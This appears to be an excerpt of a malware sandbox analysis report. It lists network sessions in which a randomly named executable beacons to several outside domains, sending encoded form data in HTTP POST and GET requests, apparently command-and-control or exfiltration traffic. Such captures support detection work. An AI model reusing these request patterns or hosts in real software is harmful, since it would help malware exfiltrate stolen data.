                                              Sep 24, 2024 11:26:51.047904015 CEST491OUTGET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:26:51.228213072 CEST1289INHTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:26:51 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                              Sep 24, 2024 11:26:51.228353977 CEST1289INData Raw: 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65
                                              Data Ascii: ets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head
                                              Sep 24, 2024 11:26:51.228425026 CEST1289INData Raw: 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d
                                              Data Ascii: <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navb
                                              Sep 24, 2024 11:26:51.228566885 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 2d 30 20 6d 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item activ
                                              Sep 24, 2024 11:26:51.228632927 CEST1289INData Raw: 62 2d 69 74 65 6d 20 74 65 78 74 2d 62 6f 64 79 20 61 63 74 69 76 65 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: b-item text-body active" aria-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid"
                                              Sep 24, 2024 11:26:51.228722095 CEST1289INData Raw: 20 76 61 6c 75 65 3d 22 33 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20
                                              Data Ascii: value="3">Property Type 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
                                              Sep 24, 2024 11:26:51.228781939 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73
                                              Data Ascii: <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our h
                                              Sep 24, 2024 11:26:51.228838921 CEST1289INData Raw: 22 66 61 62 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c
                                              Data Ascii: "fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-
                                              Sep 24, 2024 11:26:51.228895903 CEST1289INData Raw: 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20 70 2d 31 22 20 73 72 63 3d 22 69 6d 67 2f 70 72 6f 70 65 72 74 79 2d 31 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20
                                              Data Ascii: <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt=""> </div> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" s
                                              Sep 24, 2024 11:26:51.228952885 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 3e 44 6f 6c 6f 72 20 61 6d 65 74 20 73 69 74 20 6a 75 73 74 6f 20 61 6d 65 74 20 65 6c 69 74 72 20 63 6c 69 74 61 20 69 70 73 75 6d 20 65 6c 69 74 72 20 65 73 74 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: <p>Dolor amet sit justo amet elitr clita ipsum elitr est.</p> <div class="position-relative mx-auto" style="max-width: 400px;"> <input class="form-control bg-transparent w-100 py-3
                                              Sep 24, 2024 11:26:51.229015112 CEST1261INData Raw: 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36
                                              Data Ascii: </a> </div> <div class="col-md-6 text-center text-md-end"> <div class="footer-menu"> <a href="">Home</a>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.11.304990213.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:56.764674902 CEST752OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 57 2b 58 4c 34 65 71 4a 6f 45 35 54 61 31 59 30 38 62 48 42 64 38 74 38 53 79 56 30 51 48 38 36 68 42 63 51 53 71 44 78 6b 38 77 37 62 53 33 4b 44 59 69 6d 57 71 77 45 43 69 78 49 34 78 4e 52 42 41 73 2f 42 32 6e 36 64 34 4a 65 6b 2f 53 4b 39 46 7a 55 77 74 6f 51 43 58 75 57 75 49 55 76 38 47 68 70 2b 71 6d 64 36 75 71 37 7a 64 46 47 4f 62 63 75 49 55 46 4d 2f 56 76 6d 6d 6a 69 74 58 61 59 4e 4c 4a 79 33 58 46 77 56 73 5a 61 37 47 2f 69 53 6e 2f 76 4a 38 61 6f 4d 58 59 71 6b 75 4d 72 36 6b 61 6a 6a 4f 38 52 33 47 49 72 70 6a 6a 66 4a 2f 41 3d 3d
                                              Data Ascii: 7LY=Fn1dtmcByqeJW+XL4eqJoE5Ta1Y08bHBd8t8SyV0QH86hBcQSqDxk8w7bS3KDYimWqwECixI4xNRBAs/B2n6d4Jek/SK9FzUwtoQCXuWuIUv8Ghp+qmd6uq7zdFGObcuIUFM/VvmmjitXaYNLJy3XFwVsZa7G/iSn/vJ8aoMXYqkuMr6kajjO8R3GIrpjjfJ/A==
                                              Sep 24, 2024 11:26:57.293325901 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:26:57 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.11.304990313.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:26:59.635881901 CEST772OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 45 75 6e 4c 2b 50 71 4a 75 6b 35 53 48 46 59 30 6e 4c 48 46 64 38 70 38 53 7a 41 70 52 31 49 36 68 6c 51 51 54 6f 6e 78 6a 38 77 37 56 79 33 44 4e 34 69 39 57 71 38 4d 43 67 31 49 34 78 4a 52 42 46 49 2f 42 42 7a 35 63 6f 4a 6d 74 66 53 49 2b 31 7a 55 77 74 6f 51 43 58 54 78 75 49 63 76 38 32 52 70 2b 50 53 65 35 75 71 34 6b 74 46 47 66 72 63 31 49 55 46 55 2f 52 76 59 6d 67 4b 74 58 66 30 4e 61 37 4b 77 4d 31 77 58 68 35 61 75 57 2f 2f 4d 72 73 7a 32 37 35 5a 54 58 74 6d 36 76 62 61 67 35 5a 58 68 64 63 74 61 61 4a 47 42 68 68 65 53 69 4a 58 34 57 4a 6a 64 63 56 47 5a 48 58 4e 59 54 6c 37 41 57 71 73 3d
                                              Data Ascii: 7LY=Fn1dtmcByqeJEunL+PqJuk5SHFY0nLHFd8p8SzApR1I6hlQQTonxj8w7Vy3DN4i9Wq8MCg1I4xJRBFI/BBz5coJmtfSI+1zUwtoQCXTxuIcv82Rp+PSe5uq4ktFGfrc1IUFU/RvYmgKtXf0Na7KwM1wXh5auW//Mrsz275ZTXtm6vbag5ZXhdctaaJGBhheSiJX4WJjdcVGZHXNYTl7AWqs=
                                              Sep 24, 2024 11:27:00.156910896 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:26:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.11.304990413.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:02.511591911 CEST3889OUTPOST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 46 6e 31 64 74 6d 63 42 79 71 65 4a 45 75 6e 4c 2b 50 71 4a 75 6b 35 53 48 46 59 30 6e 4c 48 46 64 38 70 38 53 7a 41 70 52 31 51 36 67 57 59 51 53 49 62 78 69 38 77 37 4c 69 33 4f 4e 34 6a 6e 57 71 6b 49 43 67 6f 2f 34 79 68 52 4f 44 55 2f 49 51 7a 35 46 59 4a 6d 76 66 53 4e 39 46 7a 42 77 74 34 71 43 58 6a 78 75 49 63 76 38 31 4a 70 35 61 6d 65 32 4f 71 37 7a 64 46 61 4f 62 64 37 49 55 4e 45 2f 52 72 49 6d 6a 71 74 58 73 4d 4e 50 59 79 77 4d 31 77 58 37 70 61 74 57 2f 7a 4a 72 73 72 69 37 39 45 73 58 5a 57 36 73 50 6a 58 67 6f 66 72 50 2b 6c 33 54 4a 66 36 68 7a 4f 2f 69 2b 66 6a 52 6f 50 6a 4e 52 4f 68 4c 53 49 4d 58 77 72 39 44 50 42 76 34 44 74 53 46 63 4c 48 6c 6d 58 36 37 2f 62 55 6c 35 63 4a 34 70 38 2f 78 51 44 6a 43 4b 70 30 41 46 4e 51 2f 53 79 42 6e 77 31 59 64 2f 63 67 6d 43 73 53 67 7a 57 44 5a 35 39 58 6e 42 77 47 68 6b 34 54 73 4f 57 49 64 75 6d 54 6e 31 55 76 6c 55 5a 74 2b 31 71 54 64 6d 5a 6a 73 43 57 59 65 62 67 4d 31 63 43 75 50 37 50 55 52 55 44 78 64 48 73 66 63 48 [TRUNCATED]
                                              Data Ascii: 7LY=Fn1dtmcByqeJEunL+PqJuk5SHFY0nLHFd8p8SzApR1Q6gWYQSIbxi8w7Li3ON4jnWqkICgo/4yhRODU/IQz5FYJmvfSN9FzBwt4qCXjxuIcv81Jp5ame2Oq7zdFaObd7IUNE/RrImjqtXsMNPYywM1wX7patW/zJrsri79EsXZW6sPjXgofrP+l3TJf6hzO/i+fjRoPjNROhLSIMXwr9DPBv4DtSFcLHlmX67/bUl5cJ4p8/xQDjCKp0AFNQ/SyBnw1Yd/cgmCsSgzWDZ59XnBwGhk4TsOWIdumTn1UvlUZt+1qTdmZjsCWYebgM1cCuP7PURUDxdHsfcHZ4Ilk2EwQd0EGiOQIESNA9wg/1RfutSEWZzPOu9DD1/EFO7an4m/z469u8EEctGGb51t1YH7W98muyD/vucBkwTXKe0JJZPhZ6Ux6maceXwx05FJVgngpwBKt93bR1oNM1lXgZI3b/awKdw3B39S9BYcfD2YnA1/kvMyUpKze6hC8LiPyG//2Bcp+umMVJnSir1EbQMm3tGJskTR3Ijolq+TZaczLdNPokwueozqfgNHbDQIPuYE0SQqLkRZwhzVQaRBp7WFfm3etWWPeAEjT0BjGWbMOE1BzH2E/EKnF8/LNESNfzcJYJVC4vQzQKNVX09VHw6v1uDt2SnzloSACGQSJngEEy3jJa8bses/sTEwlBKL4WRPzm+JQdnn5vFk45/VMY43HB/UZeYi2sm51xU8vWTUEa+dTywMP9AT5FcVTMIktT6tc0qPy5RWss63K6KsOi8GfOnqW2bWYU75knJRFvA75gdsT1Dj5JWtBD9VDJKTS5C11hODQRXkuTZ1sBK5JJUmYoz1EgRJSFm7jM+UcMZ/KjGP9l4drAg120v55nmeUfjv13OHXRXkqV9G6HD8Lno+JsuWGDNkcfqNL7Z7W09WZD/QcQ2iOktIDKgfVMcS8Jqxm3gmNI50F4P+L1yK6YvdMzgDL2lqtad1v0o3W9Stk2NbMU [TRUNCATED]
                                              Sep 24, 2024 11:27:03.030097008 CEST359INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:27:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.11.304990513.76.137.44804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:05.394922018 CEST489OUTGET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:05.922755957 CEST496INHTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:27:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://14680.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT
                                              Server: CDNRay
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.11.30499063.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:11.162286997 CEST788OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 56 6b 67 70 46 74 38 38 71 5a 6e 69 79 4a 6f 4b 38 69 36 49 6b 2b 31 6f 56 2f 5a 54 61 79 6c 61 59 36 76 4f 56 75 41 44 76 74 45 6c 6e 75 52 56 31 52 4c 67 73 74 65 73 6a 36 61 6b 59 4b 6a 56 46 55 66 35 67 78 44 51 6b 35 46 34 5a 44 58 4e 71 4a 33 69 5a 68 63 70 51 77 30 44 2f 6c 4b 74 61 2b 64 74 76 73 5a 68 4a 56 70 31 32 34 67 4e 2f 4b 50 43 6b 62 42 71 38 30 6d 53 76 4d 56 56 66 4d 50 4c 62 53 52 5a 32 55 48 54 6b 74 6f 43 61 2b 42 4d 64 4d 71 5a 66 50 75 52 48 4e 73 52 43 31 37 58 71 70 49 49 6b 38 65 68 77 5a 2b 30 4e 45 58 79 58 77 3d 3d
                                              Data Ascii: 7LY=TCwg+l1JR5obVkgpFt88qZniyJoK8i6Ik+1oV/ZTaylaY6vOVuADvtElnuRV1RLgstesj6akYKjVFUf5gxDQk5F4ZDXNqJ3iZhcpQw0D/lKta+dtvsZhJVp124gN/KPCkbBq80mSvMVVfMPLbSRZ2UHTktoCa+BMdMqZfPuRHNsRC17XqpIIk8ehwZ+0NEXyXw==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.11.30499073.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:13.815155983 CEST808OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
